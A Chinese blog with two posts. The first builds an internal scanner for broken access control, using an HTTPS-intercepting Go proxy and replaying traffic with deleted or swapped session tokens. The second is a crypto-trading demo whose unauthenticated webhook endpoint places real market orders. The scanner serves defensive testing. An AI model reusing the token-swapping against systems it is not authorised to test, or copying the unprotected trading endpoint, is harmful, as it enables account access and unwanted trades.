pirogue

越权扫描器碎碎念

2020-12-14T08:27:15.000Z

碎碎念

距离写这个小轮子已经过去半年多了，希望记录下来作为自己路上的一个沉淀，在行业里有人再次提起“越权扫描器”时能有一个从前端到后端、从代理到消费、从设计到使用的感性参考。

为什么要做这个东西？

因为个人认为IAST、DAST方向的安全产品主要解决了OWASP Top 10中传统的具备可规则化的安全漏洞，比如sql注入、xss、rce等；而越权漏洞本质上可以归结为“逻辑”漏洞，逻辑类型的漏洞想要通过传统的扫描器捕获，从技术原理上来说是比较难的。比如一个功能从提出需求、评审到研发、测试、上线，每个人对它的理解都是不同的，可能研发三天不看这个代码都会忘记这个功能具体做了什么事情，指望一个不具备“智慧”大脑的扫描器理解它，并找到漏洞更是不可能的，甚至这个产品功能本身就是一个逻辑错误（类似于伪需求）。
在成熟的互联网企业，统一的公共服务，标准的研发规范，成熟的自动化流水线，再加上代码框架正逐渐步入内生安全，这一切使得传统的Web应用安全漏洞在可视范围内会越来越少。而越权漏洞可能因为研发忘记对某个参数做逻辑或归属校验，漏洞发生的限制条件很低，而造成的危害可能是极大的。

通俗点讲就是自动化难检测、易发生、高危害，但我们可以力所能及自动化一部分“水平”或“垂直”越权漏洞。

产品设计

代理

谈到自动化，就少不了数据源的自动获取，比较常见的形式就是代理作为日志的生产者。市面上这么多类型的代理我们应该选择哪种既能满足高性能又能满足https的请求、响应体的全部呢？

MitmProxy

# -*- coding: utf-8 -*-
#!/usr/bin/env python3
import mitmproxy.http
from mitmproxy import ctx, http
import time

class ProxyScan:
    def request(self, flow: mitmproxy.http.HTTPFlow)-> None:
        print('--------------------')
        print(flow.request.host)
        print(flow.request.url)
        print(flow.request.headers)
        print(flow.request.get_text())
        print(flow.request.get_content())
        print(flow.request.raw_content)
        # print(flow.request.path_components)
        print('--------------------')

addons = [
    ProxyScan()
]

mitmproxy4是官方维护的最新版本(调研时间2019年)，重构过后的新版本不再向下兼容，更稳定，并发更高。

但在测试过程中，发现通过burpsuite代理mitmproxy开启200线程并发发包，再通过mitmproxy进行代理浏览网页就会发现打开网页速度变慢。

Openresty

跟同行(b5mali4)小明哥交流过程中，他当初落地实践的是openresty代理方案。

经测试发现，openresty并发非常高，在跟mitmproxy同样的测试条件下，再通过openresty进行代理浏览网页非常流畅。

Goproxy

Goproxy地址：https://github.com/goproxy/goproxy

在学习时找到了猪猪侠3年前写的代理工具：https://github.com/ring04h/wyproxy2，基本上把所需的功能已经都已经实现，只不过它是入库mysql，我们需要将解析后的数据打进“消息队列”。

在接公司的Mafka消息队列时顺便修正了代码上的一些小问题：

在Go 1.6之前，内置的map类型是部分goroutine安全的，并发的读没有问题，并发的写可能有问题。自go 1.6之后，并发地读写map会报错，这在一些知名的开源库中都存在这个问题，所以go 1.9之前的解决方案是额外绑定一个锁，封装成一个新的struct或者单独使用锁都可以。
但是到了Go1.9发布，它有了一个新的特性，那就是sync.Map，它是原生支持并发安全的map，不过它的用法和以前我们熟悉的map完全不一样，主要还是因为sync.map封装了更为复杂的数据结构，以实现比之前加锁map更优秀的性能。

package main

import (
"bytes"
"encoding/json"
"flag"
"fmt"
"github.com/elazarl/goproxy"
"io/ioutil"
"log"
"net/http"
"os"
"regexp"
"strconv"
"strings"
"sync"
"time"
)

var (
// request.Body temp var
// RequestBodyMap = make(map[int64][]byte)
RequestBodyMap sync.Map

// http static resource file extension
static_ext []string = []string{
"js",
"css",
"ico",
"woff",
"ttf",
"map",
"woff2",
}

// media resource files type
media_types []string = []string{
"image",
"video",
"audio",
}

// http static resource files
static_types []string = []string{
"application/vnd.google.octet-stream-compressible",
"font/woff",
"font/woff2",
"text/css",
"text/javascript",
"baiduApp/json",
"application/javascript",
"application/x-javascript",
"application/msword",
"application/vnd.ms-excel",
"application/vnd.ms-powerpoint",
"application/x-ms-wmd",
"application/x-shockwave-flash",
}
)

func checkErr(err error) {
if err != nil {
log.Println(err)
}
}

type Response struct {
Origin         string      `json:"origin"`
Method         string      `json:"method"`
Status         int         `json:"status"`
ContentType    string      `json:"content_type"`
ContentLength  uint        `json:"content_length"`
Host           string      `json:"host"`
Port           string      `json:"port"`
URL            string      `json:"url"`
Scheme         string      `json:"scheme"`
Path           string      `json:"path"`
Extension      string      `json:"ext"`
ResponseHeader http.Header `json:"response_header,omitempty"`
ResponseBody   string      `json:"response_body,omitempty"`
RequestHeader  http.Header `json:"request_header,omitempty"`
RequestBody    string      `json:"request_body,omitempty"`
DateStart      time.Time   `json:"date_start"`
DateEnd        time.Time   `json:"date_end"`
}

func handleRequest(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
reqbody, err := RequestBody(req)
checkErr(err)
// RequestBodyMap[ctx.Session] = reqbody
RequestBodyMap.Store(ctx.Session, reqbody)
// log.Println(req)

return req, nil
}

//func goHandleRequest()(*http.Request, *http.Response){
//
//
//}

func RequestBody(res *http.Request) ([]byte, error) {

buf, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
res.Body = ioutil.NopCloser(bytes.NewReader(buf))
// log.Printf(string(buf))
return buf, nil
}

// json.Marshal方法优化，不对html做转义处理
func MarshalHTML(v interface{}) ([]byte, error) {
var buf bytes.Buffer
enc := json.NewEncoder(&buf)
enc.SetEscapeHTML(false)
err := enc.Encode(v)
if err != nil {
return nil, err
}
return buf.Bytes(), nil
}

func handleResponse(resp *http.Response, ctx *goproxy.ProxyCtx) *http.Response {

// Getting the Body
reqbody, ok := RequestBodyMap.Load(ctx.Session)
RequestBodyMap.Delete(ctx.Session)
if ok != false && resp != nil {
respbody, err := ResponseBody(resp)
checkErr(err)
// Attaching capture tool.
if respbody != nil {
RespCapture := New(resp, reqbody.([]byte), respbody).Parser()

static := NewResType(
RespCapture.Extension,
RespCapture.ContentType).isStatic()
//log.Println(RespCapture)
//tmpRespCapture := RespCapture
if static != true {
jsonStr, err := MarshalHTML(RespCapture)
if err != nil {
log.Fatal()
}
//fmt.Println(jsonStr)
//SynProducerCase(RespCapture)
go func() {
//f, err := os.OpenFile("./log/scan.log", os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0666)
//checkErr(err)
//defer f.Close()
//w := bufio.NewWriter(f)
//w.WriteString(string(jsonStr))
//w.Flush()
SynProducerCase(string(jsonStr))
}()

}
}

// fmt.Printf("%s\n", jsonStr)
}
return resp
}
func ResponseBody(res *http.Response) ([]byte, error) {
if res != nil {
defer res.Body.Close()
}
buf, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
res.Body = ioutil.NopCloser(bytes.NewReader(buf))
return buf, nil
}

func toJsonHeader(header http.Header) string {
js, err := json.Marshal(header)
checkErr(err)
return string(js)
}
func New(resp *http.Response, reqbody []byte, respbody []byte) *ParserHTTP {
return &ParserHTTP{r: resp, reqbody: reqbody, respbody: respbody, s: time.Now()}
}

func NewResType(ext string, ctype string) *ResType {
var mtype string
if ctype != "" {
mtype = strings.Split(ctype, "/")[0]
}
return &ResType{ext, ctype, mtype}
}

type ParserHTTP struct {
r        *http.Response
reqbody  []byte
respbody []byte
s        time.Time
}

type ResType struct {
ext   string
ctype string
mtype string
}

func (parser *ParserHTTP) Parser() Response {

var (
ctype   string
clength int
StrHost string
StrPort string
)

if len(parser.r.Header["Content-Type"]) >= 1 {
ctype = GetContentType(parser.r.Header["Content-Type"][0])
}

if len(parser.r.Header["Content-Length"]) >= 1 {
clength, _ = strconv.Atoi(parser.r.Header["Content-Length"][0])
}

SliceHost := strings.Split(parser.r.Request.URL.Host, ":")
if len(SliceHost) > 1 {
StrHost, StrPort = SliceHost[0], SliceHost[1]
} else {
StrHost = SliceHost[0]
if parser.r.Request.URL.Scheme == "https" {
StrPort = "443"
} else {
StrPort = "80"
}
}

now := time.Now()

r := Response{
Origin:         parser.r.Request.RemoteAddr,
Method:         parser.r.Request.Method,
Status:         parser.r.StatusCode,
ContentType:    string(ctype),
ContentLength:  uint(clength),
Host:           StrHost,
Port:           StrPort,
URL:            parser.r.Request.URL.String(),
Scheme:         parser.r.Request.URL.Scheme,
Path:           parser.r.Request.URL.Path,
Extension:      GetExtension(parser.r.Request.URL.Path),
ResponseHeader: parser.r.Header,
ResponseBody:   string(parser.respbody),
RequestHeader:  parser.r.Request.Header,
RequestBody:    string(parser.reqbody),
DateStart:      parser.s,
DateEnd:        now,
}

return r
}

func (r *ResType) isStatic() bool {
if ContainsString(static_ext, r.ext) {
return true
} else if ContainsString(static_types, r.ctype) {
return true
} else if ContainsString(media_types, r.mtype) {
return true
}
return false
}

func GetContentType(HeradeCT string) string {
ct := strings.Split(HeradeCT, "; ")[0]
return ct
}

func GetExtension(path string) string {
SlicePath := strings.Split(path, ".")
if len(SlicePath) > 1 {
return SlicePath[len(SlicePath)-1]
}
return ""
}

func ContainsString(sl []string, v string) bool {
for _, vv := range sl {
if vv == v {
return true
}
}
return false
}

func PathExists(path string) (bool, error) {
_, err := os.Stat(path)
if err == nil {
return true, nil
}
if os.IsNotExist(err) {
return false, nil
}
return false, err
}

func main() {

//stopper_cpu := profile.Start(profile.CPUProfile, profile.ProfilePath("."))
//defer stopper_cpu.Stop()
//stopper_mem := profile.Start(profile.MemProfile, profile.ProfilePath("."))
//defer stopper_mem.Stop()
//stopper_mutex := profile.Start(profile.MutexProfile, profile.ProfilePath("."))
//defer stopper_mutex.Stop()
//stopper_block := profile.Start(profile.BlockProfile, profile.ProfilePath("."))
//defer stopper_block.Stop()

fmt.Println("Proxy start")

// 定义代理日志目录
_dir := "log"
exist, err := PathExists(_dir)
if err != nil {
fmt.Printf("get dir error![%v]\n", err)
return
}
if exist {
fmt.Printf("Proxy log dir -> [%v]\n", _dir)
} else {
fmt.Printf("No proxy log dir -> [%v]\n", _dir)
// 创建代理目录
err := os.Mkdir(_dir, os.ModePerm)
if err != nil {
fmt.Printf("Mkdir proxy log failed![%v]\n", err)
} else {
fmt.Printf("Mkdir proxy log success!\n")
}
}
verbose := flag.Bool("v", false, "should every proxy request be logged to stdout")
addr := flag.String("l", ":8080", "on which address should the proxy listen")
flag.Parse()
proxy := goproxy.NewProxyHttpServer()
proxy.Verbose = *verbose
log.Printf("Listening %s \n", *addr)
log.Printf("proxy Start success... \n")
log.Println(goproxy.ReqHostMatches())
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile(`^.*\.(test|dev)\.(gongsi|yuming)\.com:443$`))).HandleConnect(goproxy.AlwaysMitm)
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile(`(.*\.(test|dev)\.(gongsi|yuming)\.com|10\.\d+\.\d+\.\d+)$`))).DoFunc(handleRequest)
proxy.OnResponse().DoFunc(handleResponse)
log.Fatal(http.ListenAndServe(*addr, proxy))

}

最终选择了goproxy，因为openresty相当于用nginx+lua开发，需要打补丁对https流量进行获取，打补丁后可以获取https的host，但始终无法获取请求体等。

Goproxy最终效果：
Charles+Http；Charles+Https；Burpsuite+Http；Burpsuite+Https均可以正常代理，数据进入消息队列。

越权扫描器

生产者流量有了，剩下就是核心越权扫描器引擎。

思路简单来说就是“换Cookie”，即替换请求凭证，这里可能是Cookie中的token字段值、可能是header中BA认证的字段值，每个公司的情况不一。我们公司叫token，你们公司可能叫session或者sid等，甚至可能还没统一的身份认证机制，那我们替换的就是整个cookie值。

这相当于根据“换Cookie”请求后响应的不同来判断是否存在越权，比如原始请求的响应为“phone=170221”，替换成别人cookie后的响应为仍然为“phone=170221”，那就极可能是一个越权漏洞，这也是大家常用来测试越权漏洞的方法（或者通过遍历参数，如orderid之类）。

详细思路

1）围绕着“换Cookie”的核心，我们将原始请求的响应叫做ResponseA，删除ssoid的响应叫做ResponseB，替换ssoid后的响应叫做ResponseC。
2）进一步通过删除ssoid、替换ssoid，对重新封装的请求分别发包，对3个Response的对比判断是否存在越权漏洞。
3）对比的方法我这里做了一个取巧的方式，通过相似度匹配，相似度定义为风险值，即相似度越高风险值也越大，越权漏洞发生的可能性越大。相似度匹配的算法使用ssdeep（ssdeep也常用于webshell检测）。

bacLogic.go

我们通过代码来梳理一下具体实现逻辑，在函数bacRequest中把流量日志logPayload反序列化成[]byte的json格式的reqLog，通过reqLog.RequestHeader取出header数据，然后通过processCookie函数，用change字符串“删”或“替换”作为入参判断，对header内关键的认证字段进行改变。接着下面代码会对原始请求取reqLog.Method判断是“GET”请求，还是“POST”请求，将改变后的header、原始reqLog.URL、原始的reqLog.RequestBody重发包，这时riskBac函数会对重发包的响应 []byte(r.String())与原始响应firstResp进行对比，计算riskValue风险值（相似度）。最后通过httpLogUpdate将需要的数据插入Mysql数据库做后续的结果展示等。

package main

import (
"encoding/json"
"fmt"
"github.com/imroc/req"
"log"
)

func bacRequest(logPayload string, change string, id int64) {
var reqLog Response
//fmt.Println(string(logPayload))

err := json.Unmarshal([]byte(logPayload), &reqLog) //把流量日志logPayload反序列化成[]byte的json格式的reqLog
if err != nil {
fmt.Println("json Unmarshal failed:", err)
}
//resJsonBool := strings.Contains(reqLog.ResponseHeader.Get("Content-Type"), "application/json")
header, err := processCookie(reqLog.RequestHeader, change)
if err != nil {
log.Println("处理header错误：", err)
return
}

firstResp := []byte(reqLog.ResponseBody) // firstResp 是原始请求里的Response
if reqLog.Method == "GET" {
r, _ := req.Get(reqLog.URL, header) // Request请求开始

//log.Println("修改请求的响应：",r.String()) //Mysql
riskValue := riskBac(firstResp, []byte(r.String()))
//log.Println("相似度的值为: ",riskValue)
reqHeader, _ := json.Marshal(r.Request().Header)
//reqBody, err := json.Marshal(r.Request().Body) //空
respHeader, _ := json.Marshal(r.Response().Header)
//log.Println(respHeader)
httpLogUpdate(string(reqHeader), reqLog.RequestBody, string(respHeader), r.String(), id, change, riskValue)

} else if reqLog.Method == "POST" {
// 1. 看Content-type，如果是json，就要用req的json方法请求；
header.Del("Content-Length")
r, err := req.Post(reqLog.URL, header, reqLog.RequestBody)

if err != nil {
log.Println("POST请求失败：", err)
}
riskValue := riskBac(firstResp, []byte(r.String()))

reqHeader, _ := json.Marshal(r.Request().Header)
//reqBody, err := json.Marshal(r.Request().Body) //空
respHeader, _ := json.Marshal(r.Response().Header)

httpLogUpdate(string(reqHeader), reqLog.RequestBody, string(respHeader), r.String(), id, change, riskValue)
} else if reqLog.Method == "OPTIONS" {
r, err := req.Options(reqLog.URL, header, reqLog.RequestBody)
if err != nil {
log.Println("OPTIONS请求失败：", err)
}
riskValue := riskBac(firstResp, []byte(r.String()))

reqHeader, _ := json.Marshal(r.Request().Header)
//reqBody, err := json.Marshal(r.Request().Body) //空
respHeader, _ := json.Marshal(r.Response().Header)
httpLogUpdate(string(reqHeader), reqLog.RequestBody, string(respHeader), r.String(), id, change, riskValue)

}
}

package main

import (
"github.com/go-redis/redis"
"log"
"net/http"
"regexp"
"strings"
)

func getSSOid(keySsoid string) string {
// 建立redis连接
client := redis.NewClient(&redis.Options{
Addr:     appConfig.redisAddr,
Password: appConfig.redisPass,
DB:       1,
})
defer client.Close()
ping, err := client.Ping().Result()
if err != nil {
log.Println("Redis client connect failed ping status:", err)
}
log.Println("ping status:", ping)
ssoid, err := client.Get(keySsoid).Result()
if err != nil {
log.Println("Get redis key value failed:", err)
}
if len(ssoid) < 5 {
log.Println("error: ssoid value length < 5")
return ";"
}
return ssoid
}

func processCookie(headerInput http.Header, change string) (http.Header, error) {
header := headerInput

// BA认证变更
Access_token := header.Get("access-token")
if len(Access_token) > 10 {
// 删除Cookie
if change == "del" {
// 把ssoid的值全部替换为空并替换Header头中的Cookie字段
header.Set("access-token", "")
//替换Cookie
} else {
newSSOid := getSSOid(change)
header.Set("access-token", newSSOid)
}
}

Cookie := header.Get("Cookie")

// 通过正则取出ssoid=xxx;
reg := regexp.MustCompile(`[.\w]*(ssoid|SSOID|SSO_ID|sso_id|sso_sid|SSO_SID|TGCX)=[0-9a-zA-Z-_*]+`)
//log.Println(reg.FindAllString(Cookie, -1))
client_id := reg.FindAllString(Cookie, -1)
//log.Println(client_id)
//log.Println(len(client_id))
if len(client_id) > 0 {
for _, ssoid_value := range client_id {
cookieArray := strings.Split(ssoid_value, "=") //将cookie=abc;根据等号分割成数组[cookie abc]
//ssoid := cookieArray[0] // com.hello.it.ead.cihah_ssoid
oldSsoidVal := cookieArray[1] // abc;
if len(oldSsoidVal) > 20 {
//删除Cookie
if change == "del" {
// 把ssoid的值全部替换为空并替换Header头中的Cookie字段
Cookie = strings.Replace(Cookie, oldSsoidVal, ";", -1)

//替换Cookie
} else if (change == "ssoid-offline") || (change == "ssoid-online") {
newSSOid := getSSOid(change)
Cookie = strings.Replace(Cookie, oldSsoidVal, newSSOid+";", -1)

} else {
log.Println("change 标识错误")
}
} else {
log.Println("Cookie获取失败：", cookieArray)
}
}
header.Set("Cookie", Cookie)
}
return header, nil

}

risk.go

package main

import (
"github.com/glaslos/ssdeep"
"log"
)

//通过比较日志response和二次请求中的response相似作为越权风险值
func riskBac(firstResp []byte, afterResp []byte) int {

if len(firstResp) < 30 || len(afterResp) < 30 {
return 30
}

h1, err := ssdeep.FuzzyBytes(firstResp)
if err != nil {
log.Println("ssdeep h1 error:", err)
}
//log.Println(h1)
h2, err := ssdeep.FuzzyBytes(afterResp)
if err != nil {
log.Println("ssdeep h2 error:", err)
}
//log.Println(h2)

var score int
score, err = ssdeep.Distance(h1, h2)
if err != nil {
log.Println("ssdeep distance failed.")
}
log.Println(score)
return score

}

“替换的cookie”来自哪里？crontab.go

用来做第三者的“替换cookie”也是极其重要的，它决定了在越权检测中准确性的高低。针对公司内网使用SSO进行认证的应用，我在公司申请了虚拟账号，将此账号的权限设置成最低，通过定时任务每天凌晨对认证服务进行一次请求，获取“鲜活”的cookie，用于替换和删除。

从下面代码可以看到每天凌晨1点，去走一次认证流程，将凭证存入redis，其中对业务进行了区分，比如SSO的应用，C端的应用生活费、助贷、分期，对C端不同业务制造出不同状态的账号。为什么要这样？我将在文章最后进行简单解释。

package main

import (
"errors"
"github.com/go-redis/redis"
"github.com/imroc/req"
"github.com/jakecoffman/cron"
"io"
"log"
"os"
)

type cookieMT struct {
//ssoOnlineURL  string
ssoOfflineURL string
}

type tokenMT struct {
tokenOfflineURL string  // 线下C端用户中心passport生成token地址
expenses string // 生活费，已授信，未借款 账号
diversion string // 已开通助贷（马上），未借款 账号
instalment string // 已开通分期，未借款 账号
}

// 获取线下环境ssoid的值
func (c cookieMT) Runssoff() (string, error) {
var resp map[string]interface{}
// Request请求开始
r, err := req.Get(c.ssoOfflineURL) // 线下sso地址
if err != nil {
Error.Println("SSO Offline URL request failed:", err)
}

err = r.ToJSON(&resp)
if err != nil {
Error.Println("SSO Offline URL response r.ToJSON failed:", err)
}
// interface convert to string
if resp["data"] == nil {
return "null", errors.New("获取线下ssoid为空")
}
return resp["data"].(string), nil

}

func (t tokenMT) Runtokenoff(phone string) (string, error){
// Request请求开始
r, err := req.Get(t.tokenOfflineURL+phone) // 线下sso地址
if err != nil {
Error.Println("Token Offline URL request failed:", err)
}

resp := r.String()
return resp, nil
}


// 存线下的ssoid到reids里
func redisSsoOff(client *redis.Client, key string, ssoid string) {
setStatus := client.Set(key, ssoid, 0)
Info.Println("redis setStatus:", setStatus)
}

func redisTokenOff(client *redis.Client, key string, ssoid string) {
setStatus := client.Set(key, ssoid, 0)
Info.Println("redis setStatus:", setStatus)
}

var mainCron *cron.Cron

// 定义日志全局变量
var (
Info    *log.Logger
Warning *log.Logger
Error   *log.Logger
)

// 日志初始化配置
func init() {
errFile, err := os.OpenFile("errors.log", os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err != nil {
log.Fatalln("打开日志文件失败：", err)
}

Info = log.New(os.Stdout, "Info:", log.Ldate|log.Ltime|log.Lshortfile)
Warning = log.New(os.Stdout, "Warning:", log.Ldate|log.Ltime|log.Lshortfile)
Error = log.New(io.MultiWriter(os.Stderr, errFile), "Error:", log.Ldate|log.Ltime|log.Lshortfile)

}

func redisTask() {

cookies := cookieMT{
//ssoOnlineURL:  "http://test.com/hahaservice/get?id=pirogue&password=",
ssoOfflineURL: "http://test.com/hahaservice/offline/get?id=pirogue&password=",
}

tokens := tokenMT{
tokenOfflineURL: "http://gege.test.com/api/token?q=",
expenses:        "15xxxxxxxxx",
diversion:       "13xxxxxxxxx",
instalment:      "13xxxxxxxxx",
}

// 建立redis连接
client := redis.NewClient(&redis.Options{
Addr: "localhost:1234",
Password: "xxxxxxxxxx",
DB:       1,
})
ping, err := client.Ping().Result()
if err != nil {
Error.Println("Redis client connect failed ping status:", err)
}
Info.Println("ping status:", ping)

defer client.Close()

// 请求线上接口获取ssoid
//ssoidOnline, err := cookies.Runssonline()
//if err != nil {
//Error.Println(err)
//}

// 请求线下接口获取ssoid
ssoidOffline, err := cookies.Runssoff()
if err != nil {
Error.Println(err)
}

tokenOfflineExpenses , err := tokens.Runtokenoff(tokens.expenses)
if err != nil {
Error.Println(err)
}

tokenOfflineDiversion , err := tokens.Runtokenoff(tokens.diversion)
if err != nil {
Error.Println(err)
}

tokenOfflineInstalment , err := tokens.Runtokenoff(tokens.instalment)
if err != nil {
Error.Println(err)
}

redisSsoOff(client, "ssoid-offline", ssoidOffline)
redisTokenOff(client, "token-expenses", tokenOfflineExpenses)
redisTokenOff(client, "token-diversion", tokenOfflineDiversion)
redisTokenOff(client, "token-instalment", tokenOfflineInstalment)


//redisSsoOn(client, "ssoid-online", ssoidOnline)
}

func main() {


mainCron = cron.New()

// AddJob
tasktime := "0 0 1 * * ?"   //每天凌晨1点
//tasktime := "0 0/1 * * * ? " //每2分钟

mainCron.AddFunc(tasktime, redisTask, "ssopassport")

mainCron.Start()
select {} //阻塞主线程不退出

}

扫描器后台

扫描器后台是直接提供给用户使用的，所以产品的界面核心功能（漏洞展示）是否直观、使用是否繁琐、是否有使用上的技术门槛直接决定了这款产品最终能否能被终端客户所接受。

为什么要提到“技术门槛”？

在日常工作中，我发现不同的人对使用上的“技术门槛”的接受程度是不一样的，有人觉得“Burpsuite”门槛就十分高了。如果你的产品存在此类“技术门槛”，到最后只能成为摆设或通过外包服务的方式变相使用，最终成为自己人用的产品。

核心功能是否直观？

在这个产品的设计过程中，核心功能就是越权漏洞的Response对比，如果能让人一眼看出哪些请求接口存在越权，那就成功了一半。但实际上我在使用的过程中虽然有“风险值”作为参考排序，通过肉眼判断对比response列表，点击列表展开仍然非常“繁琐”，甚至于接口太多导致手点的麻木了。后期为了设计一个人性化的界面，思考良久，也“偷窥”了一下行业内做的比较好的一家乙方产品，发现其类似功能也是需要点击列表进而查看漏洞比对的详情，所以这类核心功能要想最终能够较好的落地，是需要实践检验的，离不开开源交流和思想碰撞。

Demo展示

后台代码就非常多了，后端使用gin作为Web框架，vue作为前端框架，最终我也将awvs这个主动扫描器作为被动扫描器的引擎加入到后端，包括同事用python写的扫描器轮子。

点击“创建目标”创建扫描任务，创建完成扫描目标后，点击“常规扫描”将调用awvs进行常规漏洞扫描；点击“越权扫描”对任务进行后端“替换cookie”的配置

在弹窗的对话框中，选择是使用“SSO“的虚拟账号，还是选择”Passport“的“生活费”账号、生意贷账号等进行凭证的替换和删除。

可以看到风险值高的接口排在最上，其他字段还有host、method、url，是不是有点像web版本的burpsuite。点击蓝色的“结果”就会弹出3个Response的对比。如果这里的接口非常多，使用上将会非常麻烦，你就要点击上百次“结果”查看（今天工位的MAC触控板格外的烫手，富婆还是没有出现，我的心好累）。

抛砖引玉

没有服务意识的网络安全爱好者不是一个好的打工人…如果想从用户体验、功能实用的角度出发设计一个好的越权扫描器显然我写的轮子是失败的，越到后面功能上的细节考虑的越多，越要贴合业务。比如用户账号这一块，从QA小姐姐那里调研才知道一个BU的业务线不同产品的用户体系也会不同，账号的授信与否决定了后面逻辑是可以请求成功。

畅想一下未来，也许越权扫描也会出现对应的场景规则，比如贷款类业务、打车类业务、保险类业务，比如身份证号、银行卡号、手机号，沉淀规则，打磨框架，自动化越权检测更通用和便捷。

币圈量化交易试水

2020-06-24T15:15:33.000Z

说明

去年杂七杂八看了一些量化交易的视频算是入了门。本地回测的库有Catalyst（基于zipline）、vnpy、Zipline。

这篇文章是一个简单的Tradingview（也可以回测）交易策略通过自己写的python web程序对接火币交易所进行现货买卖的demo。

简单来说：Tradingview webhook->python web-> huobi

步骤

注册Tradingview

https://cn.tradingview.com/

打开首页你就会发现很多别人已经写好的策略在进行展示，但这些策略往往应用于其他传统金融市场，而不是数字货币。而对于我这种不懂交易会写一点点代码的人只能用别人的策略在币圈进行回测优化。

打开脚本页面

https://cn.tradingview.com/scripts/

这个页面里就是所有的开源策略。

选其中一个你认为还不错的，进行我们下面关键的web hook设置。

我这里随便举个例子：
比如选SuperTrend策略,点“添加至收藏脚本”

点击图表按钮

选择btcusdt的图表布局

左侧出现的就是btc的k线图

选择收藏的脚本应用到图表上

点击“指标&策略”,然后点击你收藏的“SuperTrend”策略脚本，这时你看图中的数字3那里，就出现了策略在盘面的走势应用图，比如箭头所指的sell，就是策略给的卖出信号。

看上图，没想到这个策略在今天还是挺准的，如果都在它给的点位买入卖出或者做多做空，应该是能赚到钱的。

注：本人没有用它做实盘策略，自己要用请自行评估。

添加信号告警

这一步是本篇文章的重点，就是如何使用tradingview的Webhook对接python web程序。tradingview我下文统一叫tv吧，太长了不好打字。

点击“警报”图标，会弹出一个对话框。

点击下拉，选中supertrend策略。

注意我红框里面选中的内容，第一个框是选策略，第二个框是策略的买入信号（待会儿我们还要创建一个卖出信号的警告），第三个框是“每根K线一次”，简单的解释就是可以一直跑，一旦符合指标就提示，其他的选项就是用一次就停止了之类的，不过多解释了。最后点创建，如果不接入webhook的话，平时人工盯盘这样用就足够了。

但是量化重点在webhook，下面我们介绍如何接入它。

先给出python的web程序代码:

#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@File    :   huobi.py
@Time    :   2020/01/10 00:07:06
@Author  :   pirogue 
@Version :   1.0
@Contact :   p1r06u3@gmail.com
@License :   (C)Copyright 2019-2020, Pirogue
@Desc    :   Tradingview webhook通知webserver对接火币交易所进行现货买卖 
'''

import ccxt
import time
import json
import tornado.web
import tornado.ioloop

ex = ccxt.huobipro({
    'apiKey': '填自己的',
    'secret': '填自己的',
    'options': {
        'createMarketBuyOrderRequiresPrice': False, # switch off
    },
})

def get_assets():
    btc_count = ex.fetch_balance()["BTC"]
    print(btc_count)
    # 账户正在使用的btc
    #btc_used = btc_count["used"]
    btc_free = btc_count["free"]
    return btc_free

def sell_btc():
    btc_count = get_assets()
    symbol = 'BTC/USDT'
    ex.create_market_sell_order(symbol,btc_count)


def buy_btc():
    symbol = 'BTC/USDT'
    amount = 0.9      # BTC
    price = 9000    # USDT
    cost = amount*price
    ex.createMarketBuyOrder(symbol, cost)


class MainHandler(tornado.web.RequestHandler):
    def get(self):
        buy = self.get_arguments("buy")
        sell = self.get_arguments("sell")
        if buy:
            buy_btc()
        if sell:
            sell_btc()
        self.write("Hello,Tornado.")
    def post(self):
        buy = self.get_arguments("buy")
        sell = self.get_arguments("sell")
        if buy:
            buy_btc()
        if sell:
            sell_btc()
        self.write("Hello,Tornado.")
# def make_app():
#     return tornado.web.Application([
#         (r"/btc",MainHandler),
#     ])
 
if __name__=="__main__":
    app = tornado.web.Application([(r'/btc',MainHandler)])
    app.listen(80)
    tornado.ioloop.IOLoop.current().start()

这段程序用到了两个python类库，一个是tornado做web，一个ccxt与交易所api对接。

ccxt 是 github上最火热的加密货币交易库，包含了近百个交易所api。支持 Python、JavaScript、PHP 三种语言调用。对于这个行业来说，各个交易所 API 签名方式、数据结构都不相同，如果一个个接入适配可以说费时费力，ccxt的出现解决了这个问题。

简单来说ccxt就是把所有的交易所的各自不同的api接口都封装好了，你只要在代码里配置好自己交易所的api key，就可以用统一的函数去实现交易。这样的好处是辛辛苦苦写的策略代码，想移植到火币就改一下火币的api key，想移植到币安就改一下币安的key，其他代码根本不用动。

注：ccxt当前还没有封装火币的季度合约接口，想做合约量化交易的可能要等官方实现或者自己实现。做现货是没问题的。

上面这段程序如何运行：

1	python huobi.py

这样就运行起来了，如果你要后台运行就

1	nohup python huobi.py &

假设你的购买的服务器ip是123.123.123.123，当你运行之后，post请求http://123.123.123.123/btc?buy
就会走到

def post(self):
    buy = self.get_arguments("buy")
    sell = self.get_arguments("sell")
    if buy:
        buy_btc()
    if sell:
        sell_btc()
    self.write("Hello,Tornado.")

函数里，程序判断post请求中有buy参数，那就执行buy_btc()，买入btc。

def buy_btc():
    symbol = 'BTC/USDT'
    amount = 0.9      # BTC
    price = 9000    # USDT
    cost = amount*price
    ex.createMarketBuyOrder(symbol, cost)

buy_btc函数里面我写的是以市价（createMarketBuyOrder）买入btc，可以去查一下这个函数createMarketBuyOrder。为什么是0.9*9000？因为我以市价买入时，只能买入这么多usdt的btc。买入逻辑需要你自己去设计，我这里只是当时的例子….

卖出跟买入的逻辑同理，可以自己看代码理解。web程序的运行逻辑就是如上所述。

怎么与webhook对接呢？看到上面其实已经很明显了，只要webhook可以请求我们服务器web程序的post接口带着buy或者sell参数就可以了。所以在webhook处配置http://123.123.123.123/btc?buy

点创建，就是一个配置了webhook的警报。这样在策略触发警报时就会执行警报配置里面的内容，比如触发Webhook。
注意Webhook触发请求时是POST请求，不是GET请求，我代码里面的get请求方法忽略就好。。POST请求里面还能携带下方表单里面设置的数据，这些我在demo里面就详细阐述了。

再创建一个卖出的警告，步骤跟上面创建警报的步骤是一样的，只是选的是相反的如下图，不再文字描述

这样tv的webhook通知python对接交易所就做完了。

对了，Webhook功能是收费的，tv收费也有点小贵…

币圈友情提示

“本是同根生，相煎何太急”，同是韭菜，我已经亏了小县城的半套房子的钱了。这个市场没有踏入的最好也别进来了，稳定的买买基金、保本理财还是挺香的，币圈到处都是庄家割你的镰刀。

